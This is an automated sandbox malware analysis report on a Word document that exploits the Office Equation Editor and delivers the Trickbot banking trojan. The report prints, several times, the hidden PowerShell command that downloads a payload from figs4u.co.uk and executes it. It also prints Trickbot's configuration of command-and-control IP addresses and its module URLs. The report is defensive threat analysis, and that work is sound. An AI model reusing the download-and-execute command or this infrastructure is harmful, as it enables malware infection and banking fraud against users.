Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:22.0.0
Analysis ID:565263
Start time:16:02:28
Joe Sandbox Product:Cloud
Start date:25.05.2018
Overall analysis duration:0h 21m 9s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:FORMP16T.docx
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:23
Number of new started drivers analysed:1
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
  • GSI enabled (Java)
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.evad.expl.troj.winDOCX@23/42@10/4
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 99
  • Number of non-executed functions: 86
EGA Information:
  • Successful, ratio: 100%
Cookbook Comments:
  • Adjust boot time
  • Correcting counters for adjusted boot time
  • Found application associated with file extension: .docx
  • Found Word or Excel or PowerPoint document
  • Simulate clicks
  • Number of clicks 162
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): mscorsvw.exe, rundll32.exe, OSPPSVC.EXE, svchost.exe, mrxdav.sys, conhost.exe, WMIADAP.exe, dllhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtEnumerateValueKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE, powershell.exe, ounehcnaykuL.exe, ounehcnaykuM.exe, ounehcnaykuM.exe

Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook



Signature Overview

Click to jump to signature section


Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001E76E0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,memcpy,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,18_2_001E76E0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001EF590 CryptBinaryToStringW,CryptBinaryToStringW,18_2_001EF590
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001EF9A0 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,18_2_001EF9A0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001EBB60 CryptStringToBinaryW,CryptStringToBinaryW,18_2_001EBB60
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 21_2_001776E0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,memcpy,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,21_2_001776E0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 21_2_0017F9A0 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,21_2_0017F9A0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 21_2_0017F590 CryptBinaryToStringW,CryptBinaryToStringW,21_2_0017F590
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 21_2_0017BB60 CryptStringToBinaryW,CryptStringToBinaryW,21_2_0017BB60

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 18_2_001E76E0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,memcpy,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,18_2_001E76E0
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeCode function: 21_2_001776E0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,memcpy,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,21_2_001776E0

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\System32\cmd.exeJump to behavior
Office Equation Editor has been startedShow sources
Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a window with clipboard capturing capabilitiesShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEWindow created: window name: CLIPBRDWNDCLASSJump to behavior

E-Banking Fraud:

barindex
Detected Trickbot e-Banking trojan configShow sources
Source: ounehcnaykuM.exe, 00000015.00000002.10777869997.001FC000.00000004.sdmpString found in binary or memory: <mcconf><ver>1000199</ver><gtag>ser0525</gtag><servs><srv>65.30.201.40:443</srv><srv>66.232.212.59:443</srv><srv>183.54.140.124:443</srv><srv>80.53.57.146:443</srv><srv>31.200.192.251:443</srv><srv>208.75.117.70:449</srv><srv>92.55.251.211:449</srv><srv>94.112.52.197:449</srv><srv>138.34.29.172:443</srv><srv>209.121.142.202:449</srv><srv>5.102.177.205:449</srv><srv>209.121.142.214:449</srv><srv>95.161.180.42:449</srv><srv>203.86.222.142:443</srv><srv>68.96.73.154:449</srv><srv>185.42.192.194:449</srv><srv>68.227.31.46:449</srv><srv>107.144.49.162:443</srv><srv>46.72.175.17:449</srv><srv>144.48.51.8:443</srv><srv>46.243.179.212:449</srv><srv>81.177.255.76:449</srv><srv>193.233.60.148:443</srv><srv>185.174.174.83:443</srv><srv>193.233.62.53:443</srv><srv>91.240.84.224:443</srv><srv>185.228.232.67:443</srv><srv>85.143.215.143:443</srv></servs><autorun><module name="systeminfo" ctl="GetSystemInfo"/><module name="injectDll"/></autorun></mcconf>ies>false</StopIfGoingOnBatteries>

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user~1\AppData\Local\Temp\task.batJump to behavior
Potential document exploit detected (performs DNS queries with low reputation score)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEDNS query: name: figs4u.co.uk
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEDNS query: name: cypruscars4u.com
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: cypruscars4u.com
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.1.16:49191 -> 87.247.241.143:80
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.1.16:49188 -> 87.247.241.143:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2021013 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex CnC) 82.202.221.37:447 -> 192.168.1.16:49197
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.1.16:49195 -> 92.55.251.211:449
Source: global trafficTCP traffic: 192.168.1.16:49197 -> 82.202.221.37:447
Domain name seen in connection with other malwareShow sources
Source: Joe Sandbox ViewDomain Name: figs4u.co.uk figs4u.co.uk
Source: Joe Sandbox ViewDomain Name: cypruscars4u.com cypruscars4u.com
Downloads files with wrong headers with respect to MIME Content-TypeShow sources
Source: httpImage file has RTF prefix: HTTP/1.1 200 OK Date: Fri, 25 May 2018 14:04:15 GMT Server: Apache Last-Modified: Fri, 25 May 2018 10:39:39 GMT Accept-Ranges: bytes Content-Length: 55287 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 7b 5c 72 74 66 31 7b 5c 70 69 63 74 5c 6a 70 65 67 62 6c 69 70 5c 70 69 63 77 32 34 5c 70 69 63 68 32 34 5c 62 69 6e 31 35 35 35 30 20 ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 01 20 01 cc 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 01 01 01 01 00 03 01 01 00 00 00 00 00 00 0
May check the online IP address of the machineShow sources
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Downloads executable code via HTTPShow sources
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 25 May 2018 14:05:03 GMTServer: ApacheLast-Modified: Fri, 25 May 2018 10:33:56 GMTAccept-Ranges: bytesContent-Length: 270387Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3d 00 7b de 79 61 15 8d 79 61 15 8d 79 61 15 8d fa 7d 1b 8d 78 61 15 8d 10 7e 1c 8d 7e 61 15 8d 90 7e 18 8d 78 61 15 8d 52 69 63 68 79 61 15 8d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 c2 07 5b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 01 00 00 b0 02 00 00 00 00 00 e4 16 00 00 00 10 00 00 00 70 01 00 0
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /logo.bin HTTP/1.1Host: figs4u.co.ukConnection: Keep-Alive
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: GET /logo.jpg HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)Accept-Encoding: gzip, deflateHost: cypruscars4u.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36Host: ipinfo.io
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.WordJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /logo.jpg HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)Accept-Encoding: gzip, deflateHost: cypruscars4u.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /logo.bin HTTP/1.1Host: figs4u.co.ukConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36Host: ipinfo.io
Found strings which match to known social media urlsShow sources
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: cypruscars4u.com
Urls found in memory or binary dataShow sources
Source: powershell.exe, 0000000A.00000002.10093802704.01B10000.00000004.sdmpString found in binary or memory: file://
Source: powershell.exe, 0000000A.00000002.10093802704.01B10000.00000004.sdmpString found in binary or memory: file:///
Source: WINWORD.EXE, 00000001.00000002.10277396020.04500000.00000004.sdmpString found in binary or memory: file:///C:
Source: powershell.exe, 0000000A.00000002.10088000862.0030F000.00000004.sdmpString found in binary or memory: file:///C:/Users/user~1/AppData/Local/Temp/ounehcnaykuL.exe
Source: WINWORD.EXE, 00000001.00000002.10258196864.00377000.00000004.sdmpString found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/Temporary%20Internet%20Files/Content.IE5
Source: WINWORD.EXE, 00000001.00000002.10257841806.00316000.00000004.sdmpString found in binary or memory: file:///C:/Users/user/Desktop/FORMP16T.docxZ
Source: WINWORD.EXE, 00000001.00000002.10257841806.00316000.00000004.sdmpString found in binary or memory: file:///C:/Users/user/Desktop/FORMP16T.docxl
Source: WINWORD.EXE, 00000001.00000002.10257841806.00316000.00000004.sdmpString found in binary or memory: file:///C:/Users/user/Desktop/FORMP16T.docx~
Source: powershell.exe, 0000000A.00000002.10088000862.0030F000.00000004.sdmpString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/-j).l
Source: powershell.exe, 0000000A.00000002.10088000862.0030F000.00000004.sdmpString found in binary or memory: file:///C:/Windows/System32/WindowsPowerShell/v1.0/;j).IN
Source: powershell.exe, 0000000A.00000002.10097655852.02151000.00000004.sdmpString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Diagnostics/1.0.0.0__31bf3856ad36
Source: powershell.exe, 0000000A.00000002.10097655852.02151000.00000004.sdmpString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Management/1.0.0.0__31bf3856ad364
Source: powershell.exe, 0000000A.00000002.10097655852.02151000.00000004.sdmpString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Commands.Utility/1.0.0.0__31bf3856ad364e35
Source: powershell.exe, 0000000A.00000002.10097655852.02151000.00000004.sdmpString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.ConsoleHost/1.0.0.0__31bf3856ad364e35/Micr
Source: powershell.exe, 0000000A.00000002.10097655852.02151000.00000004.sdmpString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.PowerShell.Security/1.0.0.0__31bf3856ad364e35/Microso
Source: powershell.exe, 0000000A.00000002.10097655852.02151000.00000004.sdmpString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.WSMan.Management/1.0.0.0__31bf3856ad364e35/Microsoft.
Source: powershell.exe, 0000000A.00000002.10097655852.02151000.00000004.sdmpString found in binary or memory: file:///C:/Windows/assembly/GAC_MSIL/System.Management.Automation/1.0.0.0__31bf3856ad364e35/System.M
Source: powershell.exe, 0000000A.00000002.10094025213.01B50000.00000004.sdmpString found in binary or memory: http://
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: http://crl.comodo.net/UTN-USERFirst-Hardware.crl0q
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: http://crt.comodoca.com/UTNAddTrustServerCA.crt0$
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmp, ounehcnaykuM.exe, 00000015.00000002.10780297708.01C40000.00000004.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.21.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: cypruscars4u.com.url.1.drString found in binary or memory: http://cypruscars4u.com/
Source: WINWORD.EXE, 00000001.00000002.10257427295.002D3000.00000004.sdmpString found in binary or memory: http://cypruscars4u.com/&
Source: WINWORD.EXE, 00000001.00000002.10257427295.002D3000.00000004.sdmpString found in binary or memory: http://cypruscars4u.com/j
Source: WINWORD.EXE, 00000001.00000002.10257841806.00316000.00000004.sdmp, WINWORD.EXE, 00000001.00000002.10274125297.03080000.00000004.sdmp, WINWORD.EXE, 00000001.00000002.10274326524.031A0000.00000004.sdmp, WINWORD.EXE, 00000001.00000002.10274433979.031C0000.00000004.sdmp, WINWORD.EXE, 00000001.00000003.10250318411.002D2000.00000004.sdmp, logo.jpg.url.1.drString found in binary or memory: http://cypruscars4u.com/logo.jpg
Source: WINWORD.EXE, 00000001.00000002.10257841806.00316000.00000004.sdmpString found in binary or memory: http://cypruscars4u.com/logo.jpgER=E
Source: WINWORD.EXE, 00000001.00000002.10257841806.00316000.00000004.sdmpString found in binary or memory: http://cypruscars4u.com/logo.jpgSSOO
Source: WINWORD.EXE, 00000001.00000002.10257841806.00316000.00000004.sdmpString found in binary or memory: http://cypruscars4u.com/logo.jpgT
Source: WINWORD.EXE, 00000001.00000002.10274433979.031C0000.00000004.sdmpString found in binary or memory: http://cypruscars4u.com/logo.jpgTg
Source: WINWORD.EXE, 00000001.00000002.10274433979.031C0000.00000004.sdmpString found in binary or memory: http://cypruscars4u.com/logo.jpgUg
Source: WINWORD.EXE, 00000001.00000002.10256887267.001FD000.00000004.sdmpString found in binary or memory: http://cypruscars4u.com/logo.jpggesktop
Source: WINWORD.EXE, 00000001.00000002.10274433979.031C0000.00000004.sdmpString found in binary or memory: http://cypruscars4u.com/logo.jpgtion.%Word
Source: WINWORD.EXE, 00000001.00000002.10276262517.03F30000.00000004.sdmpString found in binary or memory: http://cypruscars4u.comlogo.jpg
Source: powershell.exe, 0000000A.00000002.10095450491.01D62000.00000004.sdmpString found in binary or memory: http://figs4u.8
Source: powershell.exe, 0000000A.00000002.10094025213.01B50000.00000004.sdmpString found in binary or memory: http://figs4u.co.uk
Source: powershell.exe, 0000000A.00000002.10086956888.002D4000.00000004.sdmp, powershell.exe, 0000000A.00000002.10093802704.01B10000.00000004.sdmp, powershell.exe, 0000000A.00000002.10094025213.01B50000.00000004.sdmp, powershell.exe, 0000000A.00000003.9981814778.002DD000.00000004.sdmp, task (2).bat.1.drString found in binary or memory: http://figs4u.co.uk/logo.bin
Source: powershell.exe, 0000000A.00000003.9981582440.002F0000.00000004.sdmpString found in binary or memory: http://java.com/
Source: powershell.exe, 0000000A.00000003.9981582440.002F0000.00000004.sdmpString found in binary or memory: http://java.com/help
Source: powershell.exe, 0000000A.00000003.9981582440.002F0000.00000004.sdmpString found in binary or memory: http://java.com/helphttp://java.com/help
Source: powershell.exe, 0000000A.00000003.9981582440.002F0000.00000004.sdmpString found in binary or memory: http://java.com/http://java.com/
Source: WINWORD.EXE, 00000001.00000002.10274644205.0330D000.00000004.sdmpString found in binary or memory: http://ns.ad
Source: WINWORD.EXE, 00000001.00000002.10274644205.0330D000.00000004.sdmpString found in binary or memory: http://ns.adbe.
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: cmd.exe, 00000008.00000002.10109548717.00433000.00000004.sdmpString found in binary or memory: http://respons2
Source: powershell.exe, 0000000A.00000002.10086956888.002D4000.00000004.sdmp, powershell.exe, 0000000A.00000002.10093802704.01B10000.00000004.sdmp, powershell.exe, 0000000A.00000002.10094025213.01B50000.00000004.sdmp, powershell.exe, 0000000A.00000003.9981814778.002DD000.00000004.sdmp, task (2).bat.1.drString found in binary or memory: http://responsivepixels.co.uk/logo.bin
Source: WINWORD.EXE, 00000001.00000002.10257159625.00280000.00000004.sdmpString found in binary or memory: http://schem
Source: WINWORD.EXE, 00000001.00000002.10257159625.00280000.00000004.sdmpString found in binary or memory: http://schemL?
Source: powershell.exe, 0000000A.00000002.10094025213.01B50000.00000004.sdmp, powershell.exe, 0000000A.00000002.10097655852.02151000.00000004.sdmpString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationFilter
Source: powershell.exe, 0000000A.00000002.10094025213.01B50000.00000004.sdmpString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/SelectorFilter
Source: powershell.exe, 0000000A.00000002.10094025213.01B50000.00000004.sdmpString found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#IdentifyResponsep
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: WINWORD.EXE, 00000001.00000002.10274217774.03090000.00000004.sdmpString found in binary or memory: http://www.msnusers.com
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: http://www.public-trust.com/CPS/OmniRoot.html0
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: http://www.public-trust.com/cgi-bin/CRL/2018/cdp.crl0
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: http://www.usertrust.com1
Source: ounehcnaykuM.exe, 00000015.00000002.10780297708.01C40000.00000004.sdmpString found in binary or memory: https://82.202.221.37:447/ser0525/377142_W617601.5B641C454C296AB7B4B5D897D1FDADEF/5/injectDll32/
Source: ounehcnaykuM.exe, 00000015.00000002.10780297708.01C40000.00000004.sdmpString found in binary or memory: https://82.202.221.37:447/ser0525/377142_W617601.5B641C454C296AB7B4B5D897D1FDADEF/5/injectDll32/VHK/
Source: ounehcnaykuM.exe, 00000015.00000002.10780297708.01C40000.00000004.sdmpString found in binary or memory: https://82.202.221.37:447/ser0525/377142_W617601.5B641C454C296AB7B4B5D897D1FDADEF/5/systeminfo32/kE
Source: ounehcnaykuM.exe, 00000015.00000002.10777808439.001D4000.00000004.sdmpString found in binary or memory: https://92.55.251.211:449/ser0525/377142_W617601.5B641C454C296AB7B4B5D897D1FDADEF/10/62/LNOPIYJTPCBO
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: https://92.55.251.211:449/ser0525/377142_W617601.5B641C454C296AB7B4B5D897D1FDADEF/5/spk/
Source: ounehcnaykuM.exe, 00000015.00000002.10777944562.0022E000.00000004.sdmp, ounehcnaykuM.exe, 00000015.00000002.10780297708.01C40000.00000004.sdmpString found in binary or memory: https://92.55.251.211:449/ser0525/377142_W617601.5B641C454C296AB7B4B5D897D1FDADEF/63/systeminfo/GetS
Source: ounehcnaykuM.exe, 00000015.00000002.10778124574.00240000.00000004.sdmpString found in binary or memory: https://secure.comodo.com/CPS0

Remote Access Functionality:

barindex
Detected Trickbot TrojanShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeFile created: C:\Users\user\AppData\Roaming\freenet\Modules\systeminfo32Jump to behavior

Persistence and Installation Behavior:

barindex
Contains an external reference to another documentShow sources
Source: webSettings.xml.relsBinary or memory string: <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="http://cypruscars4u.com/logo.jpg" TargetMode="External"/>
Installs new ROOT certificatesShow sources
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Tries to download and execute files (via powershell)Show sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''Jump to behavior
Drops PE filesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exeFile created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exeJump to dropped file

Data Obfuscation:

barindex
Powershell starts a process from the temp directoryShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''
